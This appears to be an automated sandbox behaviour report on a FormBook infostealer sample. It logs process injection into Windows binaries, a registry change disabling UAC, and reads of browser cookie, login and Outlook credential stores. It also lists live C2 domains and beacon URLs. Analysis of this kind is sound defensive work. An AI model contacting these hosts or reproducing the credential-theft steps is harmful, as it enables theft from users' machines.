            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Windows\System32\unregmp2.exe "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: \Device\CdRom0\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disables UAC (registry)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media            		1
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		21
            Disable or Modify Tools            		1
            OS Credential Dumping            		11
            Peripheral Device Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Service Execution            		1
            Windows Service            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory3
            File and Directory Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Registry Run Keys / Startup Folder            		1
            Windows Service            		1
            Abuse Elevation Control Mechanism            		Security Account Manager113
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook612
            Process Injection            		3
            Obfuscated Files or Information            		NTDS231
            Security Software Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467140 Sample: SecuriteInfo.com.Win64.PWSX... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 46 www.vertilehub.xyz 2->46 48 www.xuzfceth.com 2->48 50 14 other IPs or domains 2->50 62 Snort IDS alert for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Antivirus detection for URL or domain 2->66 70 8 other signatures 2->70 10 SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe 1 4 2->10         started        13 wmplayer.exe 2->13         started        15 wmplayer.exe 2->15         started        signatures3 68 Performs DNS queries to domains with low reputation 46->68 process4 signatures5 82 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->82 84 Writes to foreign memory regions 10->84 86 Allocates memory in foreign processes 10->86 88 3 other signatures 10->88 17 wmplayer.exe 10->17         started        20 powershell.exe 23 10->20         started        22 WerFault.exe 22 16 10->22         started        26 2 other processes 10->26 24 unregmp2.exe 13->24         started        process6 signatures7 58 Maps a DLL or memory area into another process 17->58 28 NwXvnHITawmpBkkZKEXJ.exe 17->28 injected 60 Loading BitLocker PowerShell Module 20->60 31 WmiPrvSE.exe 20->31         started        33 conhost.exe 20->33         started        35 unregmp2.exe 24->35         started        process8 signatures9 90 Found direct / indirect Syscall (likely to bypass EDR) 28->90 37 sc.exe 1 13 28->37         started        process10 signatures11 72 Tries to steal Mail credentials (via file / registry access) 37->72 74 Tries to harvest and steal browser information (history, passwords, etc) 37->74 76 Modifies the context of a thread in another process (thread injection) 37->76 78 3 other signatures 37->78 40 NwXvnHITawmpBkkZKEXJ.exe 37->40 injected 44 firefox.exe 37->44         started        process12 dnsIp13 52 www.vertilehub.xyz 203.161.49.220, 49737, 49738, 49739 VNPT-AS-VNVNPTCorpVN Malaysia 40->52 54 www.xuzfceth.com 152.32.156.214, 49741, 49743, 49744 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK Hong Kong 40->54 56 8 other IPs or domains 40->56 80 Found direct / indirect Syscall (likely to bypass EDR) 40->80 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe21%ReversingLabsWin64.Trojan.Generic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://upx.sf.net0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.salecost.co.uk/lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk=0%Avira URL Cloudsafe
            http://www.limpiezasbarcelo.com/utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyN0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.le-kuk.shop/obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk=0%Avira URL Cloudsafe
            http://www.bayviewcribbage.com/odz6/0%Avira URL Cloudsafe
            http://www.xuzfceth.com/wvfe/0%Avira URL Cloudsafe
            http://www.videos60.com/hfmm/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://www.united-domains.de/email_website/homepage-baukasten/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.salecost.co.uk/lxk5/0%Avira URL Cloudsafe
            http://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyN0%Avira URL Cloudsafe
            http://bqtt8ppp.com:3010%Avira URL Cloudsafe
            https://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr0%Avira URL Cloudsafe
            http://www.primefindsstore.shop/hfkt/0%Avira URL Cloudsafe
            http://www.vertilehub.xyz/ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM=100%Avira URL Cloudmalware
            https://www.united-domains.de/neue-top-level-domain/0%Avira URL Cloudsafe
            https://www.united-domains.de/unternehmen/datenschutz/0%Avira URL Cloudsafe
            http://www.top65s.com/awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0=0%Avira URL Cloudsafe
            http://www.xuzfceth.com/wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk=0%Avira URL Cloudsafe
            https://www.united-domains.de/login/0%Avira URL Cloudsafe
            http://www.top65s.com/awbu/0%Avira URL Cloudsafe
            https://www.united-domains.de0%Avira URL Cloudsafe
            http://www.vertilehub.xyz/ei4t/100%Avira URL Cloudmalware
            https://www.united-domains.de/0%Avira URL Cloudsafe
            http://www.videos60.com/hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyN0%Avira URL Cloudsafe
